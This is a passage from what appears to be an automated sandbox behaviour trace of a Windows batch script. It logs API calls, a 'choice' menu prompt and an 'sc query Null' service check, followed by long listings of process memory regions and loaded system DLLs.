(_String1="COPYCMD", _String2="Red=\"41", _MaxCount=0x7) returned -15 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="winbuil", _MaxCount=0x7) returned -20 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="Yellow=", _MaxCount=0x7) returned -22 [0181.410] _wcsnicmp (_String1="COPYCMD", _String2="_batf=C", _MaxCount=0x7) returned 4 [0181.410] _wcsnicmp (_String1="COPYCMD", _String2="_batp=C", _MaxCount=0x7) returned 4 [0181.410] _wcsnicmp (_String1="COPYCMD", _String2="_Blue=\"", _MaxCount=0x7) returned 4 [0181.410] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0181.410] _wcsnicmp (_String1="COPYCMD", _String2="_deskto", _MaxCount=0x7) returned 4 [0181.410] _wcsnicmp (_String1="COPYCMD", _String2="_Green=", _MaxCount=0x7) returned 4 [0181.410] _wcsnicmp (_String1="COPYCMD", _String2="_NCS=1", _MaxCount=0x7) returned 4 [0181.410] _wcsnicmp (_String1="COPYCMD", _String2="_PSarg=", _MaxCount=0x7) returned 4 [0181.410] _wcsnicmp (_String1="COPYCMD", _String2="_Red=\"4", _MaxCount=0x7) returned 4 [0181.410] _wcsnicmp (_String1="COPYCMD", _String2="_ttemp=", _MaxCount=0x7) returned 4 [0181.410] _wcsnicmp (_String1="COPYCMD", _String2="_White=", _MaxCount=0x7) returned 4 [0181.410] _wcsnicmp (_String1="COPYCMD", _String2="_work=C", _MaxCount=0x7) returned 4 [0181.410] _wcsnicmp (_String1="COPYCMD", _String2="_Yellow", _MaxCount=0x7) returned 4 [0181.410] GetProcessHeap () returned 0x19a8f1e0000 [0181.411] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0181.411] GetProcessHeap () returned 0x19a8f1e0000 [0181.411] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12) returned 0x19a8f1ecd40 [0181.411] lstrcmpW (lpString1="\\choice.exe", lpString2="\\XCOPY.EXE") returned -1 [0181.412] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\choice.exe", lpCommandLine="choice /C:123456780 /N", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\System32", lpStartupInfo=0x43f9efe610*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="choice /C:123456780 /N", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43f9efe5f8 | out: lpCommandLine="choice /C:123456780 /N", lpProcessInformation=0x43f9efe5f8*(hProcess=0xa0, hThread=0x9c, dwProcessId=0xf34, dwThreadId=0xf38)) returned 1 [0181.429] CloseHandle (hObject=0x9c) returned 1 [0181.429] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0181.429] GetProcessHeap () returned 0x19a8f1e0000 [0181.431] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f209820) returned 1 [0181.431] GetEnvironmentStringsW () returned 0x19a8f203a00* [0181.431] GetProcessHeap () returned 0x19a8f1e0000 [0181.431] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x100e) returned 0x19a8f209820 [0181.431] memcpy (in: _Dst=0x19a8f209820, _Src=0x19a8f203a00, _Size=0x100e | out: _Dst=0x19a8f209820) returned 0x19a8f209820 [0181.431] FreeEnvironmentStringsA (penv="=") returned 1 [0181.431] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0xffffffff) Thread: id = 40 os_tid = 0x84c Process: id = "4" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x5f1a5000" os_pid = "0x13d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 894 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 895 start_va = 0x73b3dc0000 end_va = 0x73b3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000073b3dc0000" filename = "" Region: id = 896 start_va = 0x73b3e00000 end_va = 0x73b3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000073b3e00000" filename = "" Region: id = 897 start_va = 0x20659940000 end_va = 0x2065995ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000020659940000" filename = "" Region: id = 898 start_va = 0x20659960000 end_va = 0x20659974fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020659960000" filename = "" Region: id = 899 start_va = 0x7df5ffe50000 end_va = 0x7ff5ffe4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffe50000" filename = "" Region: id = 900 start_va = 0x7ff75c9b0000 end_va = 0x7ff75c9d2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff75c9b0000" filename = "" Region: id = 901 start_va = 0x7ff75d070000 end_va = 0x7ff75d080fff monitored = 0 entry_point = 0x7ff75d0716b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 902 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 903 start_va = 0x20659980000 end_va = 0x20659aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000020659980000" filename = "" Region: id = 904 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 905 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 906 start_va = 0x20659940000 end_va = 0x2065994ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020659940000" filename = "" Region: id = 907 start_va = 0x7ff75c8b0000 end_va = 0x7ff75c9affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff75c8b0000" filename = "" Region: id = 908 start_va = 0x20659af0000 end_va = 0x20659badfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 909 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 910 start_va = 0x73b4000000 end_va = 0x73b403ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000073b4000000" filename = "" Region: id = 911 start_va = 0x20659bb0000 end_va = 0x20659ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000020659bb0000" filename = "" Region: id = 912 start_va = 0x20659950000 end_va = 0x20659956fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000020659950000" filename = "" Region: id = 913 start_va = 0x7ffbe35f0000 end_va = 0x7ffbe3648fff monitored = 0 entry_point = 0x7ffbe35ffbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 914 start_va = 0x20659980000 end_va = 0x20659980fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020659980000" filename = "" Region: id = 915 start_va = 0x206599f0000 end_va = 0x20659aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000206599f0000" filename = "" Region: id = 916 start_va = 0x7ffbed140000 end_va = 0x7ffbed3bcfff monitored = 0 entry_point = 0x7ffbed214970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 917 start_va = 0x7ffbed620000 end_va = 0x7ffbed73bfff monitored = 0 entry_point = 0x7ffbed6602b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 918 start_va = 0x7ffbea0d0000 end_va = 0x7ffbea139fff monitored = 0 entry_point = 0x7ffbea106d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 919 start_va = 0x7ffbead60000 end_va = 0x7ffbeaeb5fff monitored = 0 entry_point = 0x7ffbead6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 920 start_va = 0x7ffbeb9f0000 end_va = 0x7ffbebb75fff monitored = 0 entry_point = 0x7ffbeba3ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 921 start_va = 0x20659990000 end_va = 0x20659996fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000020659990000" filename = "" Region: id = 922 start_va = 0x7ffbeb410000 end_va = 0x7ffbeb552fff monitored = 0 entry_point = 0x7ffbeb438210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 923 start_va = 0x7ffbed0e0000 end_va = 0x7ffbed13afff monitored = 0 entry_point = 0x7ffbed0f38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 924 start_va = 0x7ffbed920000 end_va = 0x7ffbed95afff monitored = 0 entry_point = 0x7ffbed9212f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 925 start_va = 0x7ffbeb1b0000 end_va = 0x7ffbeb270fff monitored = 0 entry_point = 0x7ffbeb1d0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 926 start_va = 0x7ffbe84d0000 end_va = 0x7ffbe8655fff monitored = 0 entry_point = 0x7ffbe851d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 927 start_va = 0x206599a0000 end_va = 0x206599a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000206599a0000" filename = "" Region: id = 928 start_va = 0x206599b0000 end_va = 0x206599b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000206599b0000" filename = "" Region: id = 929 start_va = 0x20659cf0000 end_va = 0x20659e77fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020659cf0000" filename = "" Region: id = 930 start_va = 0x20659e80000 end_va = 0x2065a000fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020659e80000" filename = "" Region: id = 931 start_va = 0x2065a010000 end_va = 0x2065b40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002065a010000" filename = "" Region: id = 932 start_va = 0x20659bb0000 end_va = 0x20659c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000020659bb0000" filename = "" Region: id = 933 start_va = 0x20659ce0000 end_va = 0x20659ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000020659ce0000" filename = "" Region: id = 934 start_va = 0x73b4040000 end_va = 0x73b407ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000073b4040000" filename = "" Region: id = 935 start_va = 0x7ffbebb80000 end_va = 0x7ffbed0defff monitored = 0 entry_point = 0x7ffbebce11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 936 start_va = 0x7ffbeac20000 end_va = 0x7ffbeac62fff monitored = 0 entry_point = 0x7ffbeac34b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 937 start_va = 0x7ffbea5d0000 end_va = 0x7ffbeac13fff monitored = 0 entry_point = 0x7ffbea7964b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 938 start_va = 0x7ffbeaff0000 end_va = 0x7ffbeb096fff monitored = 0 entry_point = 0x7ffbeb0058d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 939 start_va = 0x7ffbed820000 end_va = 0x7ffbed871fff monitored = 0 entry_point = 0x7ffbed82f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 940 start_va = 0x7ffbe9fa0000 end_va = 0x7ffbe9faefff monitored = 0 entry_point = 0x7ffbe9fa3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 941 start_va = 0x7ffbea010000 end_va = 0x7ffbea0c4fff monitored = 0 entry_point = 0x7ffbea0522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 942 start_va = 0x7ffbe9fb0000 end_va = 0x7ffbe9ffafff monitored = 0 entry_point = 0x7ffbe9fb35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 943 start_va = 0x7ffbe9f80000 end_va = 0x7ffbe9f93fff monitored = 0 entry_point = 0x7ffbe9f852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 944 start_va = 0x7ffbe8900000 end_va = 0x7ffbe8995fff monitored = 0 entry_point = 0x7ffbe8925570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 945 start_va = 0x20659bb0000 end_va = 0x20659beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000020659bb0000" filename = "" Region: id = 946 start_va = 0x20659c10000 end_va = 0x20659c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000020659c10000" filename = "" Region: id = 947 start_va = 0x2065b410000 end_va = 0x2065b746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 948 start_va = 0x206599c0000 end_va = 0x206599e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 949 start_va = 0x20659c20000 end_va = 0x20659c79fff monitored = 1 entry_point = 0x20659c353f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 950 start_va = 0x2065b750000 end_va = 0x2065b963fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002065b750000" filename = "" Region: id = 951 start_va = 0x2065b970000 end_va = 0x2065bb8afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002065b970000" filename = "" Region: id = 952 start_va = 0x2065bb90000 end_va = 0x2065bca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002065bb90000" filename = "" Region: id = 953 start_va = 0x2065bcb0000 end_va = 0x2065bec6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002065bcb0000" filename = "" Region: id = 954 start_va = 0x2065bed0000 end_va = 0x2065bfddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002065bed0000" filename = "" Region: id = 955 start_va = 0x73b4080000 end_va = 0x73b40bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000073b4080000" filename = "" Region: id = 956 start_va = 0x7ffbeb280000 end_va = 0x7ffbeb3d9fff monitored = 0 entry_point = 0x7ffbeb2c38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 957 start_va = 0x206599c0000 end_va = 0x206599c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000206599c0000" filename = "" Region: id = 958 start_va = 0x20659c20000 end_va = 0x20659cdbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020659c20000" filename = "" Region: id = 959 start_va = 0x206599c0000 end_va = 0x206599c3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000206599c0000" filename = "" Region: id = 960 start_va = 0x7ffbe7810000 end_va = 0x7ffbe7831fff monitored = 0 entry_point = 0x7ffbe7811a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 961 start_va = 0x7ffbe86c0000 end_va = 0x7ffbe86d2fff monitored = 0 entry_point = 0x7ffbe86c2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 962 start_va = 0x7ffbe9d90000 end_va = 0x7ffbe9de5fff monitored = 0 entry_point = 0x7ffbe9da0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 963 start_va = 0x206599d0000 end_va = 0x206599d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000206599d0000" filename = "" Region: id = 964 start_va = 0x206599e0000 end_va = 0x206599e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000206599e0000" filename = "" Region: id = 965 start_va = 0x20659bb0000 end_va = 0x20659bb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020659bb0000" filename = "" Region: id = 966 start_va = 0x20659be0000 end_va = 0x20659beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000020659be0000" filename = "" Region: id = 967 start_va = 0x20659bc0000 end_va = 0x20659bc4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 968 start_va = 0x20659bd0000 end_va = 0x20659bd0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 969 start_va = 0x20659bf0000 end_va = 0x20659bf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020659bf0000" filename = "" Region: id = 970 start_va = 0x2065bfe0000 end_va = 0x2065c1d5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002065bfe0000" filename = "" Region: id = 971 start_va = 0x7ffbdf2a0000 end_va = 0x7ffbdf513fff monitored = 0 entry_point = 0x7ffbdf310400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 972 start_va = 0x20659c00000 end_va = 0x20659c00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 973 start_va = 0x2065c1e0000 end_va = 0x2065c1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002065c1e0000" filename = "" Region: id = 974 start_va = 0x2065c1f0000 end_va = 0x2065c2ccfff monitored = 0 entry_point = 0x2065c24e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 975 start_va = 0x20659c00000 end_va = 0x20659c00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020659c00000" filename = "" Region: id = 976 start_va = 0x2065c1f0000 end_va = 0x2065c2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002065c1f0000" filename = "" Region: id = 988 start_va = 0x2065c2f0000 end_va = 0x2065c4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002065c2f0000" filename = "" Region: id = 1641 start_va = 0x2065bfe0000 end_va = 0x2065c134fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002065bfe0000" filename = "" Region: id = 1642 start_va = 0x2065b750000 end_va = 0x2065b891fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002065b750000" filename = "" Thread: id = 36 os_tid = 0x1228 Thread: id = 37 os_tid = 0xd70 Thread: id = 38 os_tid = 0x13d0 Thread: id = 39 os_tid = 0xd64 Process: id = "5" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x2da31000" os_pid = "0x139c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "sc query Null " cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 990 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 991 start_va = 0x5e51200000 end_va = 0x5e513fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005e51200000" filename = "" Region: id = 992 start_va = 0x5e51400000 end_va = 0x5e5147ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005e51400000" filename = "" Region: id = 993 start_va = 0x1d3be800000 end_va = 0x1d3be81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001d3be800000" filename = "" Region: id = 994 start_va = 0x1d3be820000 end_va = 0x1d3be834fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001d3be820000" filename = "" Region: id = 995 start_va = 0x1d3be840000 end_va = 0x1d3be843fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001d3be840000" filename = "" Region: id = 996 start_va = 0x1d3be850000 end_va = 0x1d3be850fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001d3be850000" filename = "" Region: id = 997 start_va = 0x1d3be860000 end_va = 0x1d3be861fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001d3be860000" filename = "" Region: id = 998 start_va = 0x7df5ff9b0000 end_va = 0x7ff5ff9affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff9b0000" filename = "" Region: id = 999 start_va = 0x7ff621db0000 end_va = 0x7ff621dd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff621db0000" filename = "" Region: id = 1000 start_va = 0x7ff621e70000 end_va = 0x7ff621e85fff monitored = 1 entry_point = 0x7ff621e72030 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1001 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1014 start_va = 0x1d3be870000 end_va = 0x1d3be9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001d3be870000" filename = "" Region: id = 1015 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1016 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1017 start_va = 0x1d3be800000 end_va = 0x1d3be80ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001d3be800000" filename = "" Region: id = 1018 start_va = 0x7ff621cb0000 end_va = 0x7ff621daffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff621cb0000" filename = "" Region: id = 1024 start_va = 0x1d3bea00000 end_va = 0x1d3beabdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1033 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1034 start_va = 0x5e51480000 end_va = 0x5e514fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005e51480000" filename = "" Region: id = 1035 start_va = 0x7ffbed620000 end_va = 0x7ffbed73bfff monitored = 0 entry_point = 0x7ffbed6602b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1036 start_va = 0x1d3beac0000 end_va = 0x1d3bebcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001d3beac0000" filename = "" Region: id = 1037 start_va = 0x1d3be810000 end_va = 0x1d3be816fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001d3be810000" filename = "" Region: id = 1038 start_va = 0x7ffbed0e0000 end_va = 